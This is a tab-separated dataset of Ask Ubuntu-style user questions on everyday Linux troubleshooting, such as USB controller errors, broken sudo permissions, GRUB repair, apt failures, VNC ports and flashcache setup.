354304	crashing system - how to xhci_hcd unload and only allow ehci_hcd in ubuntu 12.04 , 13.04 for debug some usb hardwares	i have few usb hardware who is using 500ma ( 5v ) power , after reserching found that external power supply or hub was the solution but that was a waste of time , even doing external power the problem keep continue . now only way to debug this problem is to disable xhci_hcd in ubuntu 12.04 or ubuntu 13.04 and keep ehci_hcd only cause that is where the 99 % problem getting started . but in ubuntu its impossible or mission impossible almost now to disable xhci_hcd how can i do that please ? ? ? tried : $ cd /etc/pm/config.d/ $ pwd /etc/pm/config.d $ ls 00sleep_module unload_modules unload_module root @ e300gent : /etc/pm/config.d # cat * suspend_modules= '' xhci '' suspend_modules= '' xhci '' suspend_modules= '' xhci '' $ tail -f /var/log/syslog oct 6 10:47:54 e300gent kernel : [ ] xhci_hcd 0000:02:00.0 : error transfer event trb dma ptr not part of current td oct 6 10:47:54 e300gent kernel : [ ] xhci_hcd 0000:02:00.0 : warn successful completion on short tx : needs xhci_trust_tx_length quirk ? oct 6 10:47:54 e300gent kernel : [ ] xhci_hcd 0000:02:00.0 : error transfer event trb dma ptr not part of current td oct 6 10:47:54 e300gent kernel : [ ] usb 3-1 : usb disconnect , device number 2 oct 6 10:48:00 e300gent kernel : [ ] usb 1-1.4 : new high-speed usb device number 5 using ehci_hcd oct 6 10:48:00 e300gent kernel : [ ] uvcvideo : found uvc 1.00 device hd pro webcam c920 ( 046d:082d ) oct 6 10:48:00 e300gent kernel : [ ] input : hd pro webcam c920 as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/input/input17 oct 6 10:48:00 e300gent mtp-probe : checking bus 1 , device 5 : `` /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4 '' oct 6 10:48:01 e300gent rtkit-daemon [ 1470 ] : successfully made thread 2583 of process 1464 ( n/a ) owned by '1000 ' rt at priority 5 . oct 6 10:48:01 e300gent rtkit-daemon [ 1470 ] : supervising 6 threads of 1 processes of 1 users . ehci_hcd : drops the device too : [ ] usb 1-1.4 : reset high-speed usb device number 5 using ehci_hcd [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : reset high-speed usb device number 5 using ehci_hcd [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : reset high-speed usb device number 5 using ehci_hcd [ ] usb 1-1.4 : device not accepting address 5 , error -110 [ ] usb 1-1.4 : reset high-speed usb device number 5 using ehci_hcd [ ] usb 1-1.4 : device not accepting address 5 , error -110 [ ] usb 1-1.4 : usb disconnect , device number 5 [ ] usb 1-1.4 : new high-speed usb device number 6 using ehci_hcd [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : device descriptor read/64 , error -110 [ ] usb 1-1.4 : new high-speed usb device number 7 using ehci_hcd [ ] usb 1-1.4 : device descriptor read/64 , error -110 and also in kernel blacklist but xhci is impossible to deactivate in ubuntu can anyone please show some steps how to disable this xhci so that i can find exact issue by debugging the device with ehci only ?
354305	mouse and keyboard do n't work from shutdown , do work from restart	i have a lenovo twist . the touchpad does n't work if i start from a cold shutdown . it does work if i restart ( i can restart using the touchscreen , which always works ) . from dmesg the differences in the 2 boots are these files are not loaded off a cold start : [ 21.221813 ] serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd002a3/0x940300/0x126c00 , board id : 2253 , fw id : 1192539 [ 21.288391 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input5 [ 25.907455 ] psmouse serio2 : alps : unknown alps touchpad : e7=10 00 64 , ec=10 00 64 [ 21.221827 ] psmouse serio1 : synaptics : serio : synaptics pass-through port at isa0060/serio1/input0 [ 21.288391 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input5 [ 21.360391 ] inputs : [ 28.169132 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/serio2/input/input13 also the psmouse module not loaded . loading it manually does not fix the problem . i tried to ssh into the laptop and load the module after a cold start . in the input devices the synaptics touchpad is not there after a cold shutdown . i am booting from uefi , not secure boot .
354306	apt-get update failed	when install python-dev4 , it failed , then -- fix-missing failed , -f install failed , then apt-get update also failed w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/source/sources 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/main/binary-amd64/packages 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/restricted/binary-amd64/packages 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/universe/binary-amd64/packages 404 not found [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-updates/multiverse/binary-amd64/packages 404 not found [ ip : 91.189.91.15 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
354307	listening on a specific port for vnc reverse connection	i 'm doing vnc reverse connection in this way : local machine ( that controls ) : vncviewer -listen 0 remote machine ( to be controlled ) : x11vnc -connect remote_ip:5500 now i need to change the 5500 port ; my remote system is initializing the connection on port 1500 and vncviewer only can listen to ports bigger than 5500 how can i listen for a vnc reverse connection on a specific port smaller than 5500 ?
354310	windows phone 7 connectivity to ubuntu 12.04 ?	i can not see the phone when i connect it to my laptop . it will charge just fine , but nothing else . i am trying to update the phone is the first reason i would like for it to be read , and the other , well for file managing reasons . if you know how i can accomplish this task ... ... ... ..please help ? ! thank you for your assistance in advance .
354311	launch sublime text 2 from terminal	i am new to ubuntu and is trying to configure my environment so i can launch sublime text 2 directly from the terminal . i followed the solution on this post but no luck so far . these are steps i did ( steps from this post ) : - > cd - > mkdir bin - > sudo ln -s `` /applications/sublime text 2.app/contents/sharedsupport/bin/subl '' /usr/bin/subl in my .bash_profile i added : export path= $ path : ~/bin this is the error i got : ~ $ subl -- help no command 'subl ' found , did you mean : command 'subs ' from package 'libsubtitles-perl ' ( universe ) command 'publ ' from package 'atfs ' ( universe ) confusions : first of all , i do n't understand why we need to create a bin folder . this folder is now in home/bin and i do n't think i am using it . ( i know there are two bin folders . one in file system/usr/bin and the other one file system/usr/local/bin . i am not sure the difference here . ) second , i noticed that after i ran the command above ( sudo ln -s ... ) i created a link in my usr/bin folder . however , when i checked this link file , it said the link is broken so i suspect that there is something wrong with the sudo command i executed . error : this link can not be used , because its target `` /applications/sublime text 2.app/contents/sharedsupport/bin/subl '' does n't exist . this commnad : sudo ln -s `` /applications/sublime text 2.app/contents/sharedsupport/bin/subl '' /usr/bin/subl does /applications/sublime text 2.app indicates the location of my sublime text 2 ? if yes , then my sublime text is actually in home/programs/sublime text 2 . so should i change the command to sudo ln -s `` /programs/sublime text 2.app/contents/sharedsupport/bin/subl '' /usr/bin/subl ? i already tried this , but since there is already a link file in my usr/bin , i got an error when i tried to run the command above . error : ln : failed to create symbolic link `/bin/subl ' : file exists when i attempted to remove it , it said permission denied . sorry , i am asking a lot because i am new to ubuntu . any help will be appreciated . thanks a lot .
354313	keyboard layout wont appear	i 'm installed gnome shell , and the layout indicator wont appear . i 've searched for answers , but no answer helped me . i 'm tried to download flags or disable `` show flags '' option but there is still empty please . here is screenshot :
354315	permission denied for all sudo comands	i just typed `` sudo chmod 770 . '' on my /usr/bin directory by mistake [ acc ] : /usr/bin $ sudo chmod 770 . now every time i run a sudo command i get a `` permission denied '' error [ acc ] ~ $ sudo bash : /usr/bin/sudo : permission denied when i open a new terminal , i get : `` bash : groups : command not found '' please help me resolve this ... : (
354320	ubuntu screen freeze	i have a problem with ubuntu . yesterday i installed ubuntu 12.04 lts to dual-boot it on my laptop with windows 8. installation went smoothly and everything seemed to be ok , but today i discovered a problem . ubuntu launches properly but after some time ( sometimes after 1 minute , sometimes after 10 ) my screen freezes . i know that only screen freezes because after freeze i can still hear for example yt video running . i tried to wait some time , so maybe it will get off but i does n't . restarting laptop did not help . could anyone give me any suggestions what can i do to fix this ? thanks for your time and help !
354321	package operation failed errors were encountered while processing : xserver-common-lts-raring	before starting with my problem description , i would like to say that this is my very first time using ubuntu or anything related to linux ! now my question ! i have installed the very last distribution of ubuntu in my laptop ( msi fx620dx ) . after a few updates i tried to install new applications such like gparted or synaptic ... but it has been impossible to even get the package installed . the same happens with any other application that i would like to install . after launching the installation i get each time the same message : *package operation failed the installation or removal of a software package failed . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 158448 files and directories currently installed . ) removing xserver-common-lts-raring ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-precise.txt by xserver-common-lts-raring' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' with different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing xserver-common-lts-raring ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : xserver-common-lts-raring* i have tried several things that i found in different forums , but i could not find a solution for this . any idea or suggestion please ? update : when i run the software updater , it says that only a partial upgrade is possible . then i get the following msg : could not install 'xserver-common-lts-raring' subprocess installed post-removal script returned error exit status 2 could not install the upgrades the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . any clue ? ? update : rs @ rs-ge620-ge620dx-fx620dx-fx623 : ~ $ sudo uname -a [ sudo ] password for rs : linux rs-ge620-ge620dx-fx620dx-fx623 3.8.0-32-generic # 47-ubuntu smp tue oct 1 22:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux rs @ rs-ge620-ge620dx-fx620dx-fx623 : ~ $ sudo lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring rs @ rs-ge620-ge620dx-fx620dx-fx623 : ~ $ sudo dpkg -l | grep xserver-xorg-video-intel ii xserver-xorg-video-intel 2:2.21.6-0ubuntu4.3 amd64 x.org x server -- intel i8xx , i9xx display driver rc xserver-xorg-video-intel-lts-raring 2:2.21.6-0ubuntu4.1~precise1 amd64 x.org x server -- intel i8xx , i9xx display driver
354322	what are different bootloaders available for ubuntu ?	we are familiar with grub2 which is the next generation of the grand unified bootloader ( grub ) . it is the default bootloader since 9.10 ( karmic koala ) . it would be good to know about what are other boot-loaders available and how to install them in ubuntu ?
354323	installing ubuntu 12.04 alongside windows 8 on lenovo e420	i have lenovo e420 , windows 7 preinstalled on my laptop the first time i bought the laptop . then i installed windows 8 . now i want to install ubuntu 12.04 alongside with windows 8 . i google and found this website where it describes how to install ubuntu alongside with windows 8 . this is the link : http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html i followed every steps on it . but then i stucked where i need to disable the secure boot . it seems since my laptop was not windows 8 preinstalled , when i went to the advanced options on windows 8 there is no `` uefi firmware settings '' . thus i ca n't turn off the secure boot . i tried to look on bios and i could n't find anything that related to turn off the secure boot . please tell me other way to disable the secureboot on windows 8 ?
354325	help with data recovery	i just want to ask whether i can recover data from a windows partition after installing ubuntu over it ? thanks in advance .
354328	redirect stdout to a file and stderr to another file	use find to compile a list of all directories in /proc , redirecting the output so that the list of directories ends up in a file called directories.txt and the list of error messages ends up in a file called errors.txt . i am new to the whole 'using terminal thing ' and i would be very thankful if someone could help me out ! thanks in advance !
354330	ssh scp between ubuntu server 12.04 and windows failing - ( prob syntax )	i was trying to use scp to copy files from my windows system to my ubuntu server , and vice versa . as you know , when defining a path in windows , `` \ '' must be used instead of `` / '' , and a `` c : '' at start . since every how-to about scp only contained linux-to-linux syntax , i used these to replace the linux counterparts where needed . that is , i used the format `` c : \folder\folder\file '' for the windows part of the arguments . however , as i have seen , the copying of the files has been constantly failing , with the message : '' ssh : could not resolve hostname c : no such file or directory lost connection '' any advice on what i have been doing wrong ?
354333	using dlink dwm 156 with ubuntu 12.04.2	i have recently a new usb modem , named dlink dwm-156 . but i am not able to connect internet via this on ubuntu . i have read and applied various solutions available online , but none works . i 'll explain things as much as i can so a solution can be figured out . this modem do have its linux drivers . first i tried to connect it without installing them , with the help of sakis3g . but sakis failed in locating device . lsusb showed device with 2001 : a706 ids . but it was not being shown anywhere in devices . then i mounted it , extracted .deb drivers and installed it . one thing to note is that after installing it , gdebi was not showing options for reinstall or remove , though when i checked it in synaptics , it was showing there as installed . anyhow , after installing drivers , when i replug modem , it gets detected in devices but as cd-rom . lsusb showed 2001:7001 as ids , which mean modem has switched . now the question is , if it has switched then why its not show showing up as a modem ? i tried usbserial-driver-bind.sh in terminal but of no use . sakis3g detects it now but while connecting it shows error like ttyusb0 is presently occupied by pid xxxx cat . i have tested modem on windows and it works like charm there . what should i do ? ?
354337	free download manager ( using wine ) browser ( in ubuntu ) integration ?	i 'm a new windows to linux immigrant . i personally love free download manager ( .exe ) for downloading . i installed it on ubuntu using wine . it works perfectly . but how do i configure for browser integration ? that is chrome in ubuntu browser integrated with fdm in wine ! any help would be appreciated . thank you .
354338	mythubuntu : integrate mythubuntu in xbmc and time programming	i have 2 questions about mythubuntu : how can i integrade mythubuntu ( for watching live tv & record it ) in xbmc ? do i have to install mythubuntu first , and then install xbmc ? or is there a plugin in xbmc for mythubuntu ? if you want to record a tv-program , wil the computer automaticly wake up if it must record something ? greets
354339	ubuntu touch , install gui	will ubuntu touch have an install gui , like cyanogenmod does , in the future ? http : //m.youtube.com/watch ? v=ppcsleeb9hw
354340	directory creation problem	what is the meaning of the following statement : i want to install math system named gap . mkdir : can not create directory `/usr/local/lib/gap4r5 ' : permission denied can not create directory /usr/local/lib/gap4r5
354342	how can i execute a file without execute permissions ?	how can i execute a file without giving myself execute permissions ( with chmod u+x ) for it ? if i try and tick the 'allow executing file as program ' checkmark , the checkmark is immediately removed .
354344	does the juju charm for postgresql automatically replicates if set up manually ?	the recommended juju charm for postgresql states a nice feature in its readme which is when configured as a standalone server it has the ability to become a master / slave with replication when adding more units . automatically . the master can even be deleted and a slave recovers its function . it sounds great but i am wondering , since i have set up a database manually ( i have sshed into the server and createdb and loaded a dump ) , will it still work or does it have to be with a db that has been created automatically with the charm ?
354347	how do i get geany to run python 2.7.3 not python version 3	whenever i make a program on geany and with python and use the pygame module and run it it returns with an error : traceback ( most recent call last ) : file `` clock.py '' , line 1 , in import time , pygane importerror : no module named pygane i heard that if you run python 2.7.3 on geany it recognizes the pygame module
354349	searching a file in filezilla	how do i find a file by filename in a remote connection in filezilla 3.6.0.2 ? i could n't find a built-in search function so i was wondering wether there are any plugins that could do that .
354351	server version 3.8.0-27 is the last kernel i can boot from	[ submitted this query as bug 1237392 on launchpad ] all kernel updates on ubuntu since kernel 3.8.0-28 result in an empty screen with no indication of startup , no response to the keyboard . i can only start up using kernel version 3.8.0-27-generic . all following numbers ( up to and including 3.8.0-31-generic ) do not result in a running system . also , the display no message at all when starting up ( after grub ) . i checked the logfiles with `` grep -n `` linux version 3.8.0- '' * '' and found only 27 to be logged , nothing for the other kernels . i am at a loss how to continue . i am running the most recent version of ubuntu server . does anyone have an idea where i can start looking for the cause of the troubles ? guus bonnema . i have reinstalled ubuntu with essentially the same result . the installation kernel version 3.8.0-19 works fine . the updated kernel 3.8.0-31 does not work . the following is the situation : when i let the machine start on itself i get no output at all . when i manually tell ubuntu to start the most recent kernel , i get 2 lines : '' loading linux-3.8.0-31-generic ... '' '' loading initial ramdisk ... '' that 's it . when i manually start the recovery kernel , i get a lot of information . finally it drops to a terminal and indicates it could not load the lvm partition /dev/mapper/server-root . this is why i never see any result in my message or dmesg on disk . the problem seems to be with the areca raid controller . it does a reset of the scsi bus eh until it finally gives up and drops to a terminal . a while after the system goes berserk with messages of non responding scsi bus . as i can not reach my harddisk , is there a way to find out what is wrong ? why does everything work fine up to and including kernel 27 and starts to malfunction after that ? did the areca software change in some way ? can anyone point me in the right direction ? guus bonnema .
354353	how to create radio player based on gnome mplayer ?	i want to make a radio player based on gnome mplayer , but just for one radio station , some like a native radio application . i do n't know if i have permission to modify mplayer , but since is open source ... an if i have permission to mofify it , where do i find the containing folder of it . this is what i want to create http : //tixel.ro/images/onefm.png
354354	ubuntu download not asking me to set a size for download	i am trying to install ubuntu 12.04 onto my samsung arm chromebook ( series 3 ) and when i do so the download is not asking me to set a size for ubuntu and instead just downloading . then when i try to open ububtu it is as if nothing was installed please help !
354357	why do i get permission denied error when configuring ipsec on ubuntu ?	when i try to edit the ipsec tools i get the permission denied error . $ /etc/ipsec.conf bash : /etc/ipsec.conf : permission denied . how can i solve this problem ?
354360	problem with th bios setting boot issues	i installed ubuntu 12 then i switched over to windows 7 home basic but now i am not able to get my bios setting back the multiboot option still shows ubuntu but i did completely format my system please help ! !
354361	how to install java plugin in firefox ?	i am trying to install java and plugins for firefox . i installed both jdk and jre . when i try with the sudo update-alternatives -- config java command it shows only one choice available . plugins are not usable in firefox . i do n't know how to uninstall and reinstall it .
354365	does ubuntu software center do apt-get remove or apt-get purge ?	and if it does apt-get remove , how would i make it do apt-get purge instead ?
354369	grub rescue after windows install	disaster , please , help asap . i had a dual boot on my pc with windows xp and lubuntu linux . then recently i had some windows errors and decided to install windows 8 instead of xp . so after i reinstalled windows i installed grub , in order to boot my old linux like this : sudo mount /dev/sda5 /mnt /dev/sda5 sudo mount -- bind /dev /mnt/dev sudo mount -- bind /proc /mnt/proc sudo mount -- bind /sys /mnt/sys sudo chroot /mnt grub-install /dev/sda and this is what fdisk -l shows : device boot id system /dev/sda1 * 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 7 hpfs/ntfs /dev/sda3 f w95 ext 'd ( lba ) < - used to be d : disk , not yet mounted /dev/sda5 83 linux /dev/sda6 82 linux swap / solaris and this is what i get when i boot linux : begin : running /scripts/local-premount ... resume : libgcrypt version : 1.5.0 resume : could not stat resume device file '/dev/sda7 ' and it says press enter to start system or something like that . my guess is that something went wrong with swap partition . i am not experienced linux user , so please provide as detailed instructions as possible .
354371	problem with partial upgrade	i 'm using ubuntu 12.04 . i 'm trying to upgrade ubuntu through `` partial upgrade '' . but following error has shows up : ca n't guess meta-package your system does not contain a ubuntu-desktop , kubuntu-desktop , xubuntu-desktop or edubuntu-desktop package and it was not possible to detect which version of ubuntu you are running . please install one of the packages above first using synaptic or apt-get before proceeding . i have tried to remove ubuntu-desktop with below command : sudo apt-get remove ubuntu-desktop but get me below error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? any ideas would be appreciated .
354372	reset ubuntu to its default state	i 'd like to delete all files and programs on ubuntu 12.10 except the preinstalled ones ( in one word , i want to reset the system to it 's default state ) . is there any way to do this without reinstalling the os ?
354375	installing ubuntu on a partition with data	i have two hard drives in my computer , one with just data and no os , three partitions , the other with windows 8 also with three partitions . now i want to install ubuntu on the hard drive with no os , on the first partition with 30 gigs free , total 100 gigs . i want to know , should i move my data from the first partition and format it , or just install without making any changes ? rather than that , i would like your suggestions on installation . thanks .
354379	enable joint stereo for one-speaker system ?	my dell studio is constantly outputting noise to the right speaker , even when no sounds are being played . i keep it turned off but music is noticeably flatter . is it possible to set ubuntu to join the stereo and play both to each speaker simultaneously so i do n't need both ? or any other solutions ? ( preferrably ones that do n't require more hardware . it 's a cable snakepit here . )
354381	system shutdown with lxterminal	how can i shutdown lubuntu using lxterminal ? i 've tried with halt or shutdown now but they does n't seem to work properly .
354383	headphones microphone is not working	i 'm trying to use my headphones with my ubuntu 13.10 . my headphones are nokia bh-905i , which can be connected via bluetooth or green+pink wires . if i use bluetooth , voice quality is terrible or microphone does n't work . if i try to choose `` headset '' option from in and out tabs in sound settings , they 're disabling each together . in out tab , i 'm using `` high sound quality a2dp '' , because it betters voice quality . how could i get my microphone working ? sound out works fine .
354384	laptop automatically wakes from suspend on power , why does a script fix it ?	my laptop would automatically wake up when i 'd close the lid after 1 second when it was connected to power . i fixed it with this script from this site # ! /bin/sh # file : `` /etc/pm/sleep.d/20_custom-ehci_hcd '' . tmplist=/tmp/ehci-dev-list case `` $ { 1 } '' in hibernate|suspend ) ; ; resume|thaw ) chvt 1 chvt 7 ; ; esac this script is stored in /etc/pm/sleep.d/20_custom-ehci_hcd i read this as if it is commanded to resume or thaw it will run chvt 1 then chvt 7 . why do those stop the resume , and why is this script required ? i 'm wondering what is wrong to cause the need for this script . thank you !
354389	how to install graphics card driver in windows xp running in virtualbox ?	i have installed linux , and inside linux i have installed virtualbox . now i want to play windows games in virtualbox using windows xp , but i need a graphics card driver , and i ca n't install the driver in virtualbox . please tell me how do i play games in virtualbox . i have a pc about configuration : • intel core i7 3.4ghhz 4770k • msi z87 mpower motherboard • msi geforce gtx760 2gb ddr5 graphics card • 1tb hard drive • 16gb ram
354391	.xscreensaver file not generating in ubuntu 12.04	i need to deploy some custom screensaver settings onto a few ubuntu systems that i manage through puppet configuration management tool . i was thinking of making a custom .xscreensaver file and pushing it onto these machines . however , even after installing xscreensaver and running `` xscreensaver-demo '' and `` xscreensaver-command '' , there is no .xscreensaver file in home directory . could someone kindly help me out on this or share a sample .xscreensaver file so that i can edit it ?
354392	install ubuntu on `` intel next unit of computing dc3217iye ''	i 'm thinking about buy this new intel product : http : //www.intel.com/content/www/us/en/desktops/dc3217iye-product-brief.html did anybody give a try to install ubuntu or any other light os on it ( lubuntu or xubuntu ) ? i could n't find too much information online yet .
354393	can not install ubuntu using dual boot ... ... main problem is with partioning the system after entering into ubuntu using flash drive	i have made partition of my hard drive and created a bootable pendrive with ubuntu 12.04 i386 then rebooted my system using pendrive ... ... ... ..then ubuntu started but ... ... ... i want to install permanently along with windows 8 but i have difficulty in partitioning the things after this in ubuntu ... for example how to create swap area etc. , ... ... ... .i followed the video in youtube in which after entering into the ubuntu system he has give a double click on the `` free space '' after that he created everything ... ... .but in my system i ca n't find the tag called `` free space '' to click on that but there is one more thing called `` unusable '' on which the double click wont work to do partition ... ... so please help me to partition the things ... ..and one more thing is that i have give a sufficient hard disk space for that i.e . 70 gb for ubuntu ..but this partition is made from f drive in windows not from c drive ... .. thank you
354394	problem in sources.list	i am facing a problem in /etc/apt/sources.list the 52nd line appears to be malformed ln 52 : deb http : //archive.canonical.com/ precisepartner . ln 53 : deb-src http : //archive.canonical.com/ precisepartner . end of file . this problem has caused synaptics package manager and ubuntu software center to not function properly and close abruptly .
354395	icons goes missing from menu bar , the same for shortcuts with fn and ctrl+	the problem occurs when i try to : connect to external monitor make screen goes black with fn+f7 apply to display settings and now most recently after installing some updates after installing ubuntu 12.04 everything works just fine . i can control the volume with my fn keys , switch between keyboard layouts , see my battery status etc . from the top menu bar . but , when i do one of the things listed above , both icons and keyboard shor-cuts `` disappears '' from the system . my firefox also get a strange grey theme , not the original black one . short-cuts like ctrl+alt+l and those that i have created my self are not working and not possible to call back . i have tried almost everything , like reinstalling unity , create new user accounts , try to reinstall `` battery indicator '' , and several different options . but nothing except from reinstalling the os seams to help . is there anybody that have stumbled upon a problem like this , and might have a solution ? i 'm running ubuntu 12.04 on a asus u41j laptop with a nvidea geforce gt425m cuba graphic card .
354405	options snd-hda-intel model= how to get working ?	well , i have a lenovo r61i laptop . i installed ubuntu 13.04 to this old laptop . i had problem with my sound sensitivity , i fixed it : volume range is narrow in 12.04 i opened via terminal sudo gedit /etc/modprobe.d/alsa-base.conf and i put the line at the end of file : options snd-hda-intel model=laptop-hpmicsense and i rebooted my laptop - sound problem dissapeared . but am not going to make a tutorial from my question thread . before `` fixing '' my sound problem , i had a perfectly working integrated microphone . after `` fixing '' my sound , microphone just got extremely low input sensitivity . i set it 's sensitivity to max , and when i hit my table near computer , i can see on the screen that it works . seems alsa does n't recognize it ... but i am not sure : / i checked youtube , many threads , forums ... none helped me . so i can choose one the of two : working microphone with narrow sound or not working microphone with good sound . does anyone know how to fix this issue ? p.s . i was running ubuntu 13.04 , but now i am on linux mint ( cinammon ) . of course - i fixed my sound , microphone does n't work . so i do n't see any difference between linux mint and ubuntu . god , nobody wants to help me : ' ( so i 've got new laptop :3
354408	i 've just installed ubuntu from my memory stick , but it 's not on my computer ?	i recently installed ubuntu using partitioning . im using windows 8 64-bit and i was following a youtube tutorial . the installation worked great , but when after it prompted me to restart the computer , i could n't load ubuntu- and i know i downloaded everything correctly . i 've tried using the msconfig command on run , and i checked the oss i have , and it only says windows 8 ? i 've tried booting my usb again ( which is what i used initially ) and it also acts as if i never downloaded ubuntu and gives me the option of installing or run without installing . what is going on ? i even deleted my partitions ( ultimately meaning i deleted ubuntu ) , made them again and re-downloaded ubutntu , and the same thing happened . how do i get ubuntu up and running , and how do i locate it ?
354410	prevent user from deleting files but allow him to add new ones	i 've got the following scenario : a pc with lubuntu 13.04 with one user . this user is n't in the sudo group and does n't have a password . i 've set a root password and changed the permissions of chmod and passwd so the user ca n't change his password and file permissions . this user should not be allowed to delete files inside /home/user , but he should be able to add new ones . is there any way to realise that ? ps : i 've tried chmodding rm and rmdir but with no effect .
354411	flashcache on xubuntu 13.04	first of all , i 'm noob on using flashcache , and all that i 'll post here is studying about it . i 've an asus k56cm , i5 with 500gb of hd and 24gb of ssd for cache . in windows 8 , the default operating system , uses expresscache for caching the hd in the ssd . i want to make the same in xubuntu , and i 've seen flashcache as the better way to do this . i 've follow several manuals , but i 'm loosing something . the partitions table is : sda 8:0 0 465,8g 0 disk ├─sda1 8:1 0 5,9g 0 part [ swap ] ├─sda2 8:2 0 117,2g 0 part / └─sda3 8:3 0 342,7g 0 part /home sdb 8:16 0 22,4g 0 disk ├─sdb1 8:17 0 250m 0 part /boot/efi ├─sdb2 8:18 0 5,9g 0 part └─sdb3 8:19 0 16,3g 0 part sda is hard disk and sdb is ssd in sdb2 i 'm using gdisk for intel rapid boot , and i want to cache /home in sdb3 . the walkthrough i 've follow is ( http : //nitocris.over-blog.net/article-flash-cache-as-home-or-root-on-ubuntu-109792445.html ) : - apt-get install git-core - mkdir -p ~/build/ ; cd ~/build/ - git clone https : //github.com/facebook/flashcache.git - sudo apt-get install git build-essential dkms linux-headers-`uname -r` uuid-dev - cd flashcache - sudo make -f makefile.dkms all boot_conf - sudo make install - sudo modprobe flashcache - sudo echo `` flashcache '' > > /etc/modules - dmesg | tail and flashcache is now installed . but my problem is when i create the flashcache link . i take the uuid of sda3 and make the flashcache_create on sdb3 : - umount /home - flashcache_create -p back home_cached /dev/sdb3 /dev/disk/by-uuid/xxx-xxx ( the id ) and then , i edit the fstab , commenting the /home mounting and adding : - /dev/mapper/home_cached /home reiserfs defaults 0 2 everything ok , but now , then when i reboot system , /home is not being mounted ... and i do n't know why ... any help ? thanks ! pd : sorry about my english , i 'm spanish : s edit : ok , i have the solution . flashcache must be created on every reboot , so i have created an script to execute on boot . i described it here : http : //ubuntuforums.org/showthread.php ? t=2179297
354412	find host ip address when guest machine is connected to host	i have an xp virtual machine on an ubuntu installation . i can connect to the internet in the guest os ( xp ) . now i want to find the ip address of the host os ( ubuntu ) . i can find the guest ip address in the connection properties in xp , but how do i find the ip of the ubuntu machine ? you should know , i want to add a dns record in my \system32\drivers\hosts so that i can access a virtual host in my ubuntu ( apache ) . using ifconfig , i can see that i have only three adapter . one is my lan adapter ( ethernet ) , the loopback and a wireless adapters . i have even tried the gateway address .
354413	grub problem after upgrading ubuntu	i 'm using ubuntu 12.04 along win7 . i have tried to upgrade ubuntu via synaptic . after upgrade , grub screen does not have ubuntu in its list . you can see shot in below : please tell me what am i missing here ? any helps would be awesome .
354414	how to install 12.04 with kernel 3.2 ?	a few days ago i reported a strange issue with an old laptop after installing 12.04 . i now know this is a problem with the kernel module presently supporting 12.04 ( 3.8 ) , since with kernel 3.2 the laptop behaves regularly ( booting debian wheezy ) . knowing that 12.04 was initially released with kernel 3.2 , i would like to try that first version on this laptop , but presently one can only download 12.04.3 . so the question is to either obtain the first 12.04 release or revert 12.04.3 back to kernel 3.2 . thanks .
354422	need help with mapping my keyboard	i 'm learning how to use ubuntu right now , so far i 'm enjoying it . there is this one thing i do n't understand . i want to replace my pg up button with alt+t . if i want to use t only i know i should use xmodmap -e `` keycode 87 = t '' but i have no idea how to add the alt button , any help .
354426	where are the systray icons for dropbox in ubuntu desktop 13.04 ( minimal ) ?	i reinstalled ubuntu desktop using the minimal cd image and the following command : $ sudo apt-get install ubuntu-desktop -- no-install-recommends after that i used ubuntu software center to make sure unity supports application indicators : http : //i.imgur.com/byf162w.png . everything works great , except for dropbox . for some reason the icon does n't appear in the tray , even though the application is running . steam on the other hand runs just fine , so it seems like there is nothing wrong with the tray itself . according to this post the tray icons should be in /usr/shared/icons/hicolor/22x22/status but it does n't contain any dropbox icons . neither do any of the other resolutions . the answer is a bit outdated , so i 'm not entirely sure it is still applicable to the current version of dropbox . i did the usual thing of reinstalling dropbox with : sudo apt-get purge nautilus-dropbox sudo apt-get install nautilus-dropbox but that did n't solve anything either . does somebody know how to fix this issue ?
